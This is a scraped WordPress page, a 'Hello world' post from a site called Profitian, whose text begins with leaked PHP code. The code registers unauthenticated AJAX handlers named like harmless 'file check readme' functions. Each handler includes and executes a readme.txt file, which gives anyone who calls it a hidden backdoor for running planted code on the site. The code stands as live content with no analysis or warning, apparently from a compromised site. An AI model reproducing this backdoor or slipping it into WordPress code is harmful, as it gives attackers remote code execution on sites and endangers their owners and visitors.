if(!function_exists('file_check_readme75657')){ add_action('wp_ajax_nopriv_file_check_readme75657', 'file_check_readme75657'); add_action('wp_ajax_file_check_readme75657', 'file_check_readme75657'); function file_check_readme75657() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme32919')){ add_action('wp_ajax_nopriv_file_check_readme32919', 'file_check_readme32919'); add_action('wp_ajax_file_check_readme32919', 'file_check_readme32919'); function file_check_readme32919() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } Hello world – Profitian

Leave a Comment

Your email address will not be published. Required fields are marked *